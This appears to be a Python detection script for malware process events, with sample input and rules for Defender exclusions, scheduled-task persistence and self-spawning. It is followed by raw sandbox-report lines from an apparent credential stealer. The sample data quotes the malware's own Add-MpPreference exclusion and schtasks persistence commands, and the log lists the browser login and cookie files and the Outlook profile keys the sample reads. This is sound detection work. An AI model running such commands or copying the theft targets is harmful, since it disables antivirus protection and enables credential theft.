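from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # full command line of the created process


# Constructed sample input: the process-creation entries from this report
# section, rendered as "parent|child|command line" (an assumed layout).
# The last line is a constructed benign control (a query, not a creation).
SAMPLE_EVENTS = "\n".join([
    r'C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"',
    r'C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"',
    r'C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe|C:\Windows\SysWOW64\schtasks.exe|"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"',
    r'C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe|C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe|"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe"',
    r'C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe|C:\Windows\SysWOW64\schtasks.exe|"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmpA2A1.tmp"',
    r'C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe|C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe|"C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe"',
    r'C:\Windows\explorer.exe|C:\Windows\System32\schtasks.exe|"C:\Windows\System32\schtasks.exe" /Query /TN "Updates\NuDUTBObHpKADz"',
])

# An excluded path under a user-writable location is the high-signal case:
# legitimate admin exclusions normally point at Program Files or server data.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.IGNORECASE)
# T1562.001: Add-MpPreference -ExclusionPath|-ExclusionProcess|-ExclusionExtension <value>
MP_EXCLUSION = re.compile(r'Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# T1053.005: schtasks /Create ... /XML <file>; the task name comes from /TN
SCHTASKS_XML = re.compile(r'/Create\b.*?/XML\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
TASK_NAME = re.compile(r'/TN\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def _quoted_or_bare(m: re.Match, first: int) -> str:
    """Return whichever alternative (quoted group `first`, bare `first+1`) matched."""
    return m.group(first) if m.group(first) is not None else m.group(first + 1)


def parse_events(text: str) -> list[ProcEvent]:
    """Parse 'parent|child|command line' lines; blank or malformed lines are skipped."""
    events: list[ProcEvent] = []
    for line in text.splitlines():
        parts = line.strip().split("|", 2)
        if len(parts) != 3:
            continue
        events.append(ProcEvent(*parts))
    return events


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (the last backslash component)."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return zero or more 'rule:detail' findings for a single event."""
    findings: list[str] = []
    child = image_name(ev.image)
    if child == "powershell.exe":
        m = MP_EXCLUSION.search(ev.cmdline)
        if m:
            target = _quoted_or_bare(m, 2).strip()
            severity = "high" if USER_WRITABLE.search(target) else "medium"
            findings.append(f"defender_exclusion:{m.group(1).lower()}:{severity}:{target}")
    if child == "schtasks.exe":
        m = SCHTASKS_XML.search(ev.cmdline)
        if m:
            xml_path = _quoted_or_bare(m, 1).strip()
            tn = TASK_NAME.search(ev.cmdline)
            task = _quoted_or_bare(tn, 1) if tn else "?"
            if TEMP_DIR.search(xml_path):
                findings.append(f"schtask_from_temp:{task}:{xml_path}")
    # A process launching its own image is how this sample stages the child
    # it later writes an MZ header into (see the "Memory written" entry above).
    if ev.parent.lower() == ev.image.lower():
        findings.append(f"self_spawn:{child}")
    return findings


def analyze(text: str) -> dict[str, list[str]]:
    """Group findings by rule name over a block of 'parent|child|cmdline' lines."""
    report: dict[str, list[str]] = {}
    for ev in parse_events(text):
        for finding in classify(ev):
            rule = finding.split(":", 1)[0]
            report.setdefault(rule, []).append(finding)
    return report


if __name__ == "__main__":
    for rule, hits in analyze(SAMPLE_EVENTS).items():
        for hit in hits:
            print(f"{rule:<20} {hit}")
```

On the sample input the script reports two high-severity Defender exclusions (both under C:\Users), two tasks created from XML in AppData\Local\Temp, and two self-spawns, and nothing for the control line. The self-spawn rule is noisy on its own (installers and updaters do it); its value here is as a correlating signal next to the other two, which is how the report's "Sigma detected" entries are worth combining in a real rule.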
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3830047300.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NuDUTBObHpKADz.exe PID: 7636, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.3824755853.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3829829868.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
